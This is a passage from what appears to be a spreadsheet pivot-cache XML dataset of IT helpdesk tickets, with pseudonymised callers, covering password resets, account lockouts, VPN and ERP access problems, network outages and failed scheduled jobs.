    <s v="lpfwkotn keycvxsl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open erp SID_34 while in office"/>
    <s v="without logging in to vpn remote, i am unable to login to erp. it throws balancing error"/>
    <s v="shjbrutf iknuqswm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="kiqrvwat gwkpxzyt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype meeting"/>
    <s v="_x000d__x000a__x000d__x000a_received from: tfnzwycd.bicohjga@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_provide me immediately the skype meeting options , presently it is not enabled_x000d__x000a__x000d__x000a_[cid:image002.png@01d23031.68ed5240]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="tfnzwycd bicohjga"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlookæ”¶åˆ°ç®±ä¸­folderå˜ä¸ºæ¯å¤©ä¸€ä¸ªfolderï¼Œofficeæç¤ºæ›´æ–°ã€‚"/>
    <s v="outlookæ”¶åˆ°ç®±ä¸­folderå˜ä¸ºæ¯å¤©ä¸€ä¸ªfolderï¼Œofficeæç¤ºæ›´æ–°ã€‚"/>
    <s v="bxfdkiol mdqlszvc"/>
    <x v="30"/>
  </r>
  <r>
    <s v="can not login skype"/>
    <s v="_x000d__x000a__x000d__x000a_received from: icvulkwh.udnyietg@gmail.com_x000d__x000a__x000d__x000a_dear it,_x000d__x000a__x000d__x000a_i can not login the skype, would you pls help to check it ,"/>
    <s v="icvulkwh udnyietg"/>
    <x v="31"/>
  </r>
  <r>
    <s v="sn 04os20400001808 has been identified as unavailable via esrs monitoring services and you may have no esrs connectivity"/>
    <s v="sn 04os20400001808 has been identified as unavailable via esrs monitoring services and you may have no esrs connectivity"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to create delivery:mm#2110924 can print d/n, but can't post. detail information see attachment."/>
    <s v="please provide the following:_x000d__x000a__x000d__x000a_what order number? _x000d__x000a__x000d__x000a_what material or item number?  mm#2110924_x000d__x000a__x000d__x000a_what warehouse location? plant_308 0001 _x000d__x000a__x000d__x000a_issue description / error message? see attachment"/>
    <s v="bjrtfeyi fuqapwtv"/>
    <x v="5"/>
  </r>
  <r>
    <s v="erp SID_34 account locked "/>
    <s v="erp SID_34 account locked "/>
    <s v="afijkocw rjtxslpa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to down load ethics module "/>
    <s v="from: brdhdd dhwduw_x000a_sent: thursday, october 27, 2016 6:12 am_x000a_to: nwfodmhc exurcwkm_x000a_subject::fwd: unable to down load ethics module _x000a__x000a__x000a_begin forwarded message:_x000a_from:  &lt;dqwhpjxy.pozjxbey@gmail.com&gt;_x000a_to:  &lt;zanivrec.capbfhur@gmail.com&gt;_x000a_subject: unable to down load ethics module _x000a_hi  â€“ trust doing well . i am unable to down load &amp; getting below msg. i did reset resolution however still same issue persist._x000a_ _x000a_please help._x000a_ _x000a_ _x000a_ _x000a_ _x000a_ _x000a_director of sales _x000a_company indirect channels  - asia _x000a_&amp; _x000a_dqwhpjxy.pozjxbey@gmail.com _x000a__x000a_ _x000a_ _x000a_ _x000a_ _x000a__x000a__x000a_"/>
    <s v="dqwhpjxy pozjxbey"/>
    <x v="0"/>
  </r>
  <r>
    <s v="è½¬å‘:  company email to private phone-hprdlbxf nozjtgwi"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hprdlbxf.nozjtgwi@gmail.com_x000d__x000a__x000d__x000a_all_x000d__x000a__x000d__x000a_please help to set up the email access to my private own cell phone._x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="hprdlbxf nozjtgwi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage: , india: site hard down since at 7:23 pm et at 10/26. no backup circuit."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________7:23 pm et at 10/2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telecom_vendor_1#25191486_____________________       _x000d__x000a__x000d__x000a_12. notified  gsc  ___na_____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to log in to ess"/>
    <s v="unable to log in to ess"/>
    <s v="zqvpaxry yvzodtqp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype error while logging in "/>
    <s v="skype error while logging in "/>
    <s v="nyjvwsxf npwoglzf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vitalyst transfer: crm installation "/>
    <s v="vitalyst transfer: crm installation "/>
    <s v="anpocezt qturbxsg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access benefits tab"/>
    <s v="unable to access benefits tab"/>
    <s v="qlpmxbno fjxuqbew"/>
    <x v="0"/>
  </r>
  <r>
    <s v="laptop is very slow,  any dialog bog i open is choppy &amp; flickers....  delayed"/>
    <s v="laptop is very slow,  any dialog bog i open is choppy &amp; flickers....  delayed"/>
    <s v="ieptnhox xastpbfy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_873601"/>
    <s v="ticket update on inplant_873601"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="running full production and need erp update pushed out for several hours."/>
    <s v="summary:for saturday october 29 th  we will be running full production and need erp update pushed out for several hours."/>
    <s v="xrmvbenu pynjmqci"/>
    <x v="4"/>
  </r>
  <r>
    <s v="india:  29060s-access-sw01 and sw02 went down at 02:12 pm et on 10/26."/>
    <s v="india:  29060s-access-sw01 and sw02 went down at 02:12 pm et on 10/26."/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="7"/>
  </r>
  <r>
    <s v="need password reset"/>
    <s v="need password reset"/>
    <s v="mkozqvfr ixsqykhe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issues with pdf viewer on iphone for davidthd"/>
    <s v="issues with pdf viewer on iphone for davidthd"/>
    <s v="eqzibjhw ymebpoih"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_tools not connected to network even though vpn is connected."/>
    <s v="engineering_tools not connected to network even though vpn is connected."/>
    <s v="tgseqfni ehlabdtf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook/crm"/>
    <s v="_x000d__x000a__x000d__x000a_received from: anpocezt.qturbxsg@gmail.com_x000d__x000a__x000d__x000a_are having issue with outlook and crm on our phone and computers?_x000d__x000a__x000d__x000a_sent from my iphone_x000d__x000a_best "/>
    <s v="anpocezt qturbxsg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need erp password reset for hdty.yrhxssytu@company.com"/>
    <s v="need erp password reset for hdty.yrhxssytu@company.com"/>
    <s v="ldgyxbrm cdporkfj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i need security for the uacyltoe hxgaycze and dev copies of crm"/>
    <s v="_x000d__x000a__x000d__x000a_received from: azxhejvq.fyemlavd@gmail.com_x000d__x000a__x000d__x000a_to do some general uacyltoe hxgayczeing and training i will need access to the training and development application for microsoft dynamics._x000d__x000a__x000d__x000a_mikhghytr wafglhdrhjop_x000d__x000a_sr. manager, global ethics and compliance programdntys_x000d__x000a_o:724-539-5147 m:412-558-3346 f:866-635-3932_x000d__x000a__x000d__x000a_company inc | 1600 technology way  | usa pa  15650-0231_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="azxhejvq fyemlavd"/>
    <x v="22"/>
  </r>
  <r>
    <s v="internal users are unable to download discount price file on distributor_tool / company center"/>
    <s v="internal users are unable to download discount price file on distributor_tool / company center.  the issue is probably related to the change made for ftp download.  we need to fix issues aerp as this is causing lost sales.  _x000a__x000a_external users works fine._x000a__x000a_all,_x000a_zsdr0shstrud_x000a_is the price maintenance abap report for the pricing team to maintain price data in erp erp and it is going to be limited to pricing functions for all price related uploads into erp._x000a__x000a_however, the function &quot;distributor discount report&quot; from that report i don't see a problem to usa access also for internal users (especially as the external users seem to have already access to it):_x000a__x000a__x000a_best "/>
    <s v="stdezpqw bkmeuhfz"/>
    <x v="21"/>
  </r>
  <r>
    <s v="unable to login to collaboration_platform"/>
    <s v="unable to login to collaboration_platform"/>
    <s v="vmfopnsj nuhldvxw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to receive emails on company provided iphone"/>
    <s v="unable to receive emails on company provided iphone"/>
    <s v="naecuhxz hdrqvume"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="rlhkfdqa fmhioqla"/>
    <x v="0"/>
  </r>
  <r>
    <s v="EU_tool ist sehr langsadgtym \ywqgrbnx jwnsyzbv \jionmpsf wnkpzcmv"/>
    <s v="EU_tool ist sehr langsadgtym \ywqgrbnx jwnsyzbv \jionmpsf wnkpzcmv"/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="request to reset microsoft online services password for sgblhypi.htqmidsn@gmail.com"/>
    <s v="request to reset microsoft online services password for sgblhypi.htqmidsn@gmail.com"/>
    <s v="sgblhypi htqmidsn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="alte eq abholen \wrcktgbd wzrgyunp"/>
    <s v="alte eq abholen \wrcktgbd wzrgyunp"/>
    <s v="wrcktgbd wzrgyunp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme lan an tgeyd1 \we_wu113 \wrcktgbd wzrgyunp"/>
    <s v="probleme lan an tgeyd1 \we_wu113 \wrcktgbd wzrgyunp"/>
    <s v="wrcktgbd wzrgyunp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="support fÃ¼r we111\zlqfptjx xnklbfua"/>
    <s v="support fÃ¼r we111\zlqfptjx xnklbfua"/>
    <s v="zlqfptjx xnklbfua"/>
    <x v="24"/>
  </r>
  <r>
    <s v="username locked"/>
    <s v="_x000a__x000a_received from: inhekdol.anvqzdif@gmail.com_x000a__x000a_hello,_x000a__x000a_username &quot;gdthryd&quot;; mgvpoyqd tnlshpwb, is locked out of his computer. i am sending this message on his behalf._x000a__x000a_please help,_x000a__x000a_inhekdol anvqzdif_x000a_quality technologist_x000a_inhekdol.anvqzdif@gmail.com&lt;mailto:inhekdol.anvqzdif@gmail.com&gt;_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="inhekdol anvqzdif"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to lan internet "/>
    <s v="unable to connect to lan internet "/>
    <s v="qwreamdz pmarxvtk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="install collaboration_platform"/>
    <s v="install collaboration_platform"/>
    <s v="cqwtksbu tgxockrn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request to reset microsoft online services password for hbcejwsz.cejsmdpf@gmail.com"/>
    <s v="request to reset microsoft online services password for hbcejwsz.cejsmdpf@gmail.com"/>
    <s v="hbcejwsz cejsmdpf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update "/>
    <s v="ticket update "/>
    <s v="pbhmwqtz wqlbudjx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="wjsfbpuv lcpdfihr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot access guest wifi sponsor portal"/>
    <s v="receive &quot;sponsor portal internal error&quot; when attempting to issue guest wifi access_x000d__x000a_this is the link i was given to use:_x000d__x000a_#createknownaccountssummary_x000d__x000a_"/>
    <s v="ctxwsvam vwgpjauf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user needs help to login to the company vpn."/>
    <s v="user needs help to login to the company vpn._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-help the user login to the company vpn._x000d__x000a_-user confirmed he is now abl eto login to the erp SID_34._x000d__x000a_-issue resolved."/>
    <s v="jborwynt gidxbfrq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to map mailboxes of colleagues."/>
    <s v="need to map mailboxes of colleagues."/>
    <s v="tbepisvq fxvgltmp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset"/>
    <s v="erp SID_34 password reset"/>
    <s v="lbtrsuev fxyrgeps"/>
    <x v="0"/>
  </r>
  <r>
    <s v="new team details not updated on bobj reports from ess"/>
    <s v="new team and manager details not updated on bobj reports from ess. on opening the bex reports from ess (refer screenshot) the reports still shows the old team data. need to reflect the new team data._x000d__x000a__x000d__x000a_new manager details are already updated on erp._x000d__x000a__x000d__x000a_phone: 204 78sartlgeo lhqksbdx902"/>
    <s v="owtlmpuv oicrjsfh"/>
    <x v="8"/>
  </r>
  <r>
    <s v="email font showing very small when replying to emails."/>
    <s v="email font showing very small when replying to emails._x000d__x000a_-connected to the user system using teamviewer_x000d__x000a_-corrected the font size._x000d__x000a_-advised the user to check now._x000d__x000a_-user confirmed all is fine now._x000d__x000a_-issue resolved."/>
    <s v="dqgjxhrt kydnpacx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for hdthy v hstdd using password_management_tool password reset."/>
    <s v="reset passwords for hdthy v hstdd using password_management_tool password reset."/>
    <s v="kcnosyae zlpmfxgs"/>
    <x v="16"/>
  </r>
  <r>
    <s v="computer in the maintenance dept. is down. please fix."/>
    <s v="computer in the maintenance dept. is down. please fix."/>
    <s v="juaxnvwz reampilj"/>
    <x v="2"/>
  </r>
  <r>
    <s v="computer is down in the old cnc area. please fix for erp."/>
    <s v="computer is down in the old cnc area. please fix for erp."/>
    <s v="juaxnvwz reampilj"/>
    <x v="2"/>
  </r>
  <r>
    <s v="user needs new telephony_software password."/>
    <s v="user needs new telephony_software password._x000a_"/>
    <s v="mvaxhzks kyzvflth"/>
    <x v="6"/>
  </r>
  <r>
    <s v="vip  - printer connection request to ag99435"/>
    <s v="_x000a__x000a_received from: sbgvrncj.idfhtoqv@gmail.com_x000a__x000a_hello,_x000a_i want to connect my workstation to printer ag99435 in germany._x000a_the following screen shot says i need permission to connect to this printer from the system administrator._x000a__x000a_[cid:image003.jpg@01d22f99.9aa063b0]_x000a_many "/>
    <s v="sbgvrncj idfhtoqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i cannot get onto the network on my pc."/>
    <s v="i cannot get onto the network on my pc."/>
    <s v="ubqjihpt pzrjxmgd"/>
    <x v="2"/>
  </r>
  <r>
    <s v="vip 1 :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tqjsmwvk arqoytbh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="misplaced password for the hub"/>
    <s v="unable to login to the hub"/>
    <s v="heuvlktj ulzcsyvi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please reset my SID_34 password"/>
    <s v="_x000a__x000a_received from: azxhejvq.fyemlavd@gmail.com_x000a__x000a_user id  gdthrujt_x000a__x000a_"/>
    <s v="azxhejvq fyemlavd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to setup guest wi fi access"/>
    <s v="need to setup guest wi fi access"/>
    <s v="hmgbwyce sacuoyfe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="trouble viewing and printing commerirtcal inwarehouse_tools"/>
    <s v="_x000d__x000a__x000d__x000a_received from: iksqbuxf.muzxgwvk@gmail.com_x000d__x000a__x000d__x000a_good day._x000d__x000a__x000d__x000a_please assist with issue below._x000d__x000a__x000d__x000a_[cid:image001.png@01d22f8f.02e693a0]_x000d__x000a__x000d__x000a_[cid:image002.png@01d22f8f.02e693a0]_x000d__x000a__x000d__x000a_when clicking to view the commercial inwarehouse_tool, this appears blank._x000d__x000a__x000d__x000a_please help._x000d__x000a__x000d__x000a_kind "/>
    <s v="iksqbuxf muzxgwvk"/>
    <x v="17"/>
  </r>
  <r>
    <s v="outlook won't open."/>
    <s v="outlook won't open."/>
    <s v="rjfmpgdq outipdcm"/>
    <x v="2"/>
  </r>
  <r>
    <s v="engineering tool takes a long time to load"/>
    <s v="issue is severe especially after 3:30 pm everyday._x000d__x000a_wants to talk to engineering tool administration team to check on account."/>
    <s v="janivrtg hstolemu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="folders list in outlook dierppeared"/>
    <s v="cannot see any of the folders, in outlook, emails appeared in the view"/>
    <s v="ijmabvlz vosuedkm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="snxlwqzo uxkgdiov"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot connect to network resources in hq"/>
    <s v="cannot access erp, hq network drives_x000a_internal network drive access is working fine._x000a__x000a_performed a flush dns / winsock reset, still nogo._x000a__x000a_multiple users affected_x000a__x000a_ip: 10.170.245.10_x000a_"/>
    <s v="mfvkxghn mzjasxqd"/>
    <x v="3"/>
  </r>
  <r>
    <s v="dringend : schulungsraum 1 . sprechanlage funktioniert nicht."/>
    <s v="schulungsraum 1 . sprechanlage funktioniert nicht._x000d__x000a_"/>
    <s v="qrmbywzv mnvdcuhj"/>
    <x v="28"/>
  </r>
  <r>
    <s v="data back up for germany"/>
    <s v="data back up for germany"/>
    <s v="bjtguqne xthqrzpc"/>
    <x v="11"/>
  </r>
  <r>
    <s v="server ekpsm005678 located at germany location is down since 2:27am on 10/15/16 "/>
    <s v="server ekpsm005678 located at germany location is down since 2:27am on 10/15/16 "/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="11"/>
  </r>
  <r>
    <s v="germany - (company):pbx trunk card &amp;pbx  since 6:11 am et on 10/26."/>
    <s v="germany - (company):pbx trunk card &amp;pbx  since 6:11 am et on 10/26."/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="konto gespaerrt."/>
    <s v="konto gespaerrt."/>
    <s v="mtairqlh zuhyfmnp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to sign in to the vpn"/>
    <s v="i am not able to sign onto vpn with my user name and password.  it says incorrect password, but it is the one i always use."/>
    <s v="lwgytuxq qspdztiw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="security incidents - ( #in33071122 ) :[ipbl]: [no entry] beshryulisted ip - lmsl8405227"/>
    <s v="source ip :_x000a_system name :lmsl9516338_x000a_user  name:trhdyd mffbsf_x000a_location :usa_x000a_sep , sms status :no updates_x000a_field sales user ( yes / no) :  yes_x000a_dsw event log:see below_x000a__x000a_"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="2"/>
  </r>
  <r>
    <s v="shortcut opening multiple folders"/>
    <s v="shortcut opening multiple folders"/>
    <s v="hnkwirgv wdgebvpz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="system updation for govt. tender e-procurement "/>
    <s v="_x000a__x000a_received from: qalyeunp.eiyrcxog@gmail.com_x000a__x000a_dear sir,_x000a__x000a_we required system updating for govt. tender uploading in e-portal on the following computer:_x000a__x000a_computer name :  aiuw8911576789_x000a_service tag no.    :  jnjxbq1234_x000a_model details :  optiplex 780_x000a_please do the needful and  confirm on urgent basis._x000a__x000a__x000a_with kind  "/>
    <s v="qalyeunp eiyrcxog"/>
    <x v="18"/>
  </r>
  <r>
    <s v="unable to login to pc"/>
    <s v="account locked out"/>
    <s v="bjtguqne xthqrzpc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="urgent - access to rtnzvplq erhmuncq disconnected"/>
    <s v="_x000a__x000a_received from: osjqfbvw.hlmgrfpx@gmail.com_x000a__x000a_hi,_x000a__x000a_could you please help, after an error message &quot;server disconnected&quot; i cannot make any edits to trgdyyufs' calendar, no invitations from his calendar, no calendar entries possible._x000a__x000a_very urgent._x000a_"/>
    <s v="osjqfbvw hlmgrfpx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2103 failed in job_scheduler at: 10/26/2016 05:43:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2103 failed in job_scheduler at: 10/26/2016 05:43:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job pp_EU_tool_conf_ap1 failed in job_scheduler at: 10/26/2016 05:42:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_conf_ap1 failed in job_scheduler at: 10/26/2016 05:42:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="expense report - receipt entry screen keeps locking up"/>
    <s v="expense report - receipt entry screen keeps locking up_x000d__x000a_this is causing delays with entering expense reports, especially wherein multiple entries are required."/>
    <s v="jgxclrzp jzeantui"/>
    <x v="0"/>
  </r>
  <r>
    <s v="install EU_tool \laeusvjo fvaihgpx"/>
    <s v="install EU_tool \laeusvjo fvaihgpx"/>
    <s v="laeusvjo fvaihgpx"/>
    <x v="24"/>
  </r>
  <r>
    <s v="access to  m:\live\mw_live(HostName_95)"/>
    <s v="please provide access to below drive to view the drawings_x000d__x000a_m:\live\mw_live"/>
    <s v="jycshmvf uewramti"/>
    <x v="11"/>
  </r>
  <r>
    <s v="network outage:germany site is down since 4.46amet on 10/26."/>
    <s v="what type of outage:  ____x_network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _____4.46amet on 10/26._________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? _no_____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? _no______    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  __no____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   _na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x v="7"/>
  </r>
  <r>
    <s v="entire location at germany network is down.(germany)"/>
    <s v="entire location at germany network is down._x000a_-user mention all the applications are down(erp, outlook, internet, intranet)_x000a_"/>
    <s v="mynfoicj riuvxdas"/>
    <x v="7"/>
  </r>
  <r>
    <s v="HostName_19 : volume c:\  disk consumed is 85% ."/>
    <s v="HostName_19 : volume c:\  disk consumed is 85% ."/>
    <s v="utyeofsk rdyzpwhi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="let's talk - not playing"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rjanhbde.owfkyjcp@gmail.com_x000d__x000a__x000d__x000a_hello ,_x000d__x000a__x000d__x000a_refer the below screen shot._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d22f8f.98f6b6e0]_x000d__x000a__x000d__x000a_warm "/>
    <s v="rjanhbde owfkyjcp"/>
    <x v="18"/>
  </r>
  <r>
    <s v="HostName_1035(bobj): cpu load on server is high currently utilization is 100% since 3:57am on 10/26/16"/>
    <s v="HostName_1035(bobj): cpu load on server is high currently utilization is 100% since 3:57am on 10/26/16"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="11"/>
  </r>
  <r>
    <s v="purchasing can not working "/>
    <s v="purchasing input the related the information ,also generated the ordered number 21765757669 .but check the erp me5a no data can check .pls help ,"/>
    <s v="vSMfFXAJ OUAhWpDS"/>
    <x v="29"/>
  </r>
  <r>
    <s v="EU_tool aktualisierung alle 15 min lÃ¤uft nicht   "/>
    <s v="EU_tool aktualisierung alle 15 min lÃ¤uft nicht"/>
    <s v="kfirsmxn dieluyra"/>
    <x v="25"/>
  </r>
  <r>
    <s v="kindly copy the desktop files of  (user id:  vvgtyrhds) to  (vvkuhtdppg) local folder."/>
    <s v="kindly copy the desktop files of  (user id:  vvgtyrhds) to  (vvkuhtdppg) local folder."/>
    <s v="gzmafoiv spqjlbar"/>
    <x v="18"/>
  </r>
  <r>
    <s v="problems with nikulatrhdy"/>
    <s v="_x000a__x000a_received from: koahsriq.wdugqatr@gmail.com_x000a__x000a_hello,_x000a_the account nikulatrhdy is &quot;currently locked out&quot;. the user cannot log on the system._x000a_please help._x000a__x000a_Ñ ÑƒÐ²Ð°Ð¶ÐµÐ½Ð¸ÐµÐ¼,_x000a_ÐµÐ²Ð³ÐµÐ½Ð¸Ñ._x000a__x000a__x000a_koahsriq wdugqatr,_x000a_administrative assistant._x000a_koahsriq.wdugqatr@gmail.com&lt;mailto:koahsriq.wdugqatr@gmail.com&gt;_x000a__x000a_"/>
    <s v="koahsriq wdugqatr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage: india carrier (company-ap-ind-carrier-891-dmvpn-rtr02) is down since 2.45am et on 10/26."/>
    <s v="what type of outage:  _____network     _x____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____no____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ____2.45am et on 10/26.__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x v="7"/>
  </r>
  <r>
    <s v="job Job_495 failed in job_scheduler at: 10/26/2016 03:24:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_495 failed in job_scheduler at: 10/26/2016 03:24:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="purchasing catalog de-kroschke does not work"/>
    <s v="error message when try to open the shop:_x000d__x000a_shop failure_x000d__x000a_you cannot enter the selected shop. _x000d__x000a_reason_x000d__x000a_authentication data is missing or cookie was not accepted by client_x000d__x000a__x000d__x000a_catalogue has moved to another url see attached mail with the details_x000d__x000a_"/>
    <s v="rhinvtua aquyjfbs"/>
    <x v="29"/>
  </r>
  <r>
    <s v="kalendereintrÃ¤ge - qdxyifhj zbwtunpy"/>
    <s v="hallo, bitte einmal ansehen. danke."/>
    <s v="qmwhlnev ixtmkwdc"/>
    <x v="32"/>
  </r>
  <r>
    <s v="need a wireless mouse for my laptop"/>
    <s v="need a wireless mouse for my laptop"/>
    <s v="aobrelcs suchytro"/>
    <x v="28"/>
  </r>
  <r>
    <s v="labeldrucker wk 44567 druckt nicht mehr"/>
    <s v="labeldrucker wk 44567 druckt nicht mehr"/>
    <s v="tigwlquj evynjiar"/>
    <x v="32"/>
  </r>
  <r>
    <s v="job bwhrattr failed in job_scheduler at: 10/26/2016 02:10:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwhrattr failed in job_scheduler at: 10/26/2016 02:10:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="windows locked"/>
    <s v="_x000a__x000a_received from: nmgesubf.wugbalmy@gmail.com_x000a__x000a_hi,_x000a__x000a_   following user id (winows) is locked, pl. help._x000a__x000a_user id : thrydufg,_x000a__x000a__x000a_"/>
    <s v="nmgesubf wugbalmy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="daten kann nicht heruntergeladen werden"/>
    <s v="daten kann nicht heruntergeladen werden._x000a_die maschine ist im stillstand._x000a__x000a_maschine name: wam77035673_x000a__x000a_datei werden von udo. trhsysba@gmail.com geschikt. _x000a_datei warden in zip und .exe format _x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="egbziufw syzpgchf"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to login to erp SID_34"/>
    <s v="unable to login to erp SID_34"/>
    <s v="wfkuvimj gqbmzdkt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp schulung raum :7 kann  beamer nicht verbinden"/>
    <s v="erp schulung raum :7 kann  beamer nicht verbinden_x000d__x000a__x000d__x000a_reopened as user called in again. please refer to tkt: inplant_868331"/>
    <s v="dkinobsv wymgzcrh"/>
    <x v="28"/>
  </r>
  <r>
    <s v="job Job_1854 failed in job_scheduler at: 10/26/2016 01:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1854 failed in job_scheduler at: 10/26/2016 01:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to scan after resetting password on password_management_tool"/>
    <s v="unable to scan after resetting password on password_management_tool._x000a_contact number: _x000a__x000a_scan documents are not landing in the scan folder, please check _x000a_"/>
    <s v="vfoyenlw ntpbdeyf"/>
    <x v="18"/>
  </r>
  <r>
    <s v="job Job_2668 failed in job_scheduler at: 10/26/2016 01:05:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2668 failed in job_scheduler at: 10/26/2016 01:05:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="printer issue"/>
    <s v="&quot;your file could not be printed due to an error on \\HostName_769\tc78 on e05&quot;"/>
    <s v="symieovf tjrwmcfg"/>
    <x v="2"/>
  </r>
  <r>
    <s v="engineering record issue"/>
    <s v="1.) eng records for engineering tool can't usedï¼Œsee attachment for detailed_x000d__x000a_"/>
    <s v="rcpghuqb bxrqamng"/>
    <x v="25"/>
  </r>
  <r>
    <s v="business_client not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: lvxakohq.tsfnhowj@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_business_client soft ware not working in my computer._x000d__x000a__x000d__x000a_with kind "/>
    <s v="lvxakohq tsfnhowj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="new password not working in vpn"/>
